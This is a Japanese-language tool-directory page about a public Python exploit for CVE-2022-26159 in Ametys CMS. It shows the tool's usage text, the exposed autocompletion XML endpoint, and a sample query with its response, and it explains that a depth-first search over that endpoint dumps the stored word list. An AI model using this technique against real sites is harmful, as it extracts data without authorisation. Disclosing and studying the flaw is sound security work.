Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-26159-Ametys-Autocompletion-XML — Ametys CMSのオートコンプリートプラグインに保存されているすべてのデータを自動的にローカルのSQLiteデータベースファイルにダンプするPythonエクスプロイト。 | Kitploit
ツール/GitHubGitHub/p0dalirius/cve-2022-26159-ametys-autocompletion-xml
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集クローラー
GitHubp0dalirius/cve-2022-26159-ametys-autocompletion-xml

CVE-2022-26159-Ametys-Autocompletion-XML

Ametys CMSのオートコンプリートプラグインに保存されているすべてのデータを自動的にローカルのSQLiteデータベースファイルにダンプするPythonエクスプロイト。

リポジトリを見るウェブサイト
14364年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-26159-Ametys-Autocompletion-XML

Ametys CMS のオートコンプリートプラグインに保存されたすべてのデータを、ローカルの sqlite データベースファイルに自動的にダンプする Python エクスプロイト。
GitHub release (latest by date) YouTube Channel Subscribers

機能

  • オートコンプリートプラグインが返す最大結果数の自動検出。
  • 深さ優先探索による全結果のダンプ。
  • ログファイルの出力。

使用方法

root@kitploit:~
$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -h
CVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podalirius

usage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        arg1 help message
  -H HEADERS, --header HEADERS
                        Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")
  -k, --insecure        Disable SSL/TLS warnings and certificate verification.
  -v, --verbose         Verbose mode. (default: False)
  -q, --quiet           Quiet mode. (default: False)
  --no-colors           Disables colored output. (default: False)

技術的詳細

Ametys CMS <= 4.4.0 のオートコンプリートプラグインは、以下のアドレスでワードリストを含む XML ファイルを公開しています。

root@kitploit:~
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml

このデータベースにリクエストを送信するには、攻撃者は q(クエリ)パラメータに単語の先頭を入力するだけです。

root@kitploit:~
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm

そしてオートコンプリートプラグインは、adm(クエリ)で始まる最初の10個の一致する単語を XML ファイルで返します。

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<auto-completion>
    <item>administrateur</item>
    <item>administrateurs</item>
    <item>administratif</item>
    <item>administratifs</item>
    <item>administration</item>
    <item>administrations</item>
    <item>administrative</item>
    <item>administratives</item>
    <item>administres</item>
    <item>admission</item>
</auto-completion>

これを踏まえて、攻撃者は API に対する深さ優先探索 を実行するだけで、その内容をすべて抽出できます。

コントリビューション

プルリクエストは歓迎します。他の機能を追加したい場合は、遠慮なく issue を開いてください。

参考文献

  • https://podalirius.net/en/cves/2022-26159/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26159
  • https://issues.ametys.org/browse/CMS-10973
  • https://podalirius.net/en/articles/scraping-search-apis-depth-first-style/
ツールをダウンロード